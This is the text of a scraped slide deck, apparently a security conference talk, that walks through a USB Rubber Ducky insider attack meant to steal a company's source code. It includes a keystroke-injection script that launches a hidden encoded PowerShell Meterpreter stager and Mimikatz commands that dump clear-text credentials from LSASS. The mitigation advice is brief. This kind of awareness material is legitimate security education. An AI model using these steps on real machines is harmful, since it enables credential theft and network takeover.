Recommended
Recommended
More Related Content
What's hot
What's hot (20)
Viewers also liked
Viewers also liked (14)
Similar to Duck Hunter - The return of autorun
Similar to Duck Hunter - The return of autorun (20)
Recently uploaded
Recently uploaded (20)
Duck Hunter - The return of autorun
- 1. 10/02/2014 Nimrod Levy Information security consultant Duck Hunter The return of autorun
- 2. $ WHOAMI • Information Security consultant at 2Bsecure@Matrix • Certified OSCP (Offensive Security Certified Professional) • Security tools personally developed: AutoBrowser 3.0 Subdomain Analyzer PyWeakServices tool • 1st Place at The Israel Cyber Challenge, 2014 The Symantec™ Cyber Readiness Challenge was hosted during the CyberTech event
- 3. The mission We are employees in the “Fakesoft” company and we are very disappointed by the way the administration is behaving. We think that we can develop the software by ourselves and make a fortune. We need to find a way to take over a "Domain Admin" user account, through this account get access to the backup server, and copy the source code of the software.
- 4. Obstacles • Antivirus software is installed and running on end-user stations. • No internet access. • Segmentation with a central firewall • Use of all removable storage is denied from the stations.
- 5. Programmable HID USB Keyboard USB Rubber ducky: USB rubber ducky is a smart device which can emulate a keyboard or a mouse when connected to a computer and can execute a pre programmed instructions.
- 6. Programmable HID USB Keyboard Examples of attack vector scenarios: • Add users to the system • Deploy and run programs • Upload local files • Download and install apps • Go to website that the victim has cookies for, and perform a CSRF attack.
- 8. Scenario code DELAY 3000 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 800 ENTER ENTER STRING powershell -nop -wind hidden -noni –enc METERPRETER ENCRYPTED AND ENCODED PAYLOAD ENTER
- 9. What do we need ? Meterpreter payload stager: Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
- 10. What do we need ? Mimikatz: Mimikatz is a post-exploitation tool written by Benjamin Delpy (gentilkiwi). The functionality of Mimikatz we can use is the dumped sessions saved within LSASS and obtain clear-text credentials of user accounts that connected to this machine.
- 11. Post-exploitation scenario Command Explanation getsystem Attempt to elevate your privilege to local system. load mimikatz Loading mimikatz extension mimikatz_command -f sekurlsa::logonPasswords full Run a custom command. This module extracts passwords that saved on lsass memory background Backgrounds the current session
- 12. Result Now we have taken control of a domain admin account that is not linked directly to us. What can we do? • Copy the source code we initially wanted. • Delete or manipulate sensitive organizational data. • Full control of user account management. • Install malicious applications using the GPO.
- 13. Mitigation • Define a whitelist for authorized devices. • Increase awareness for social engineering among the employees.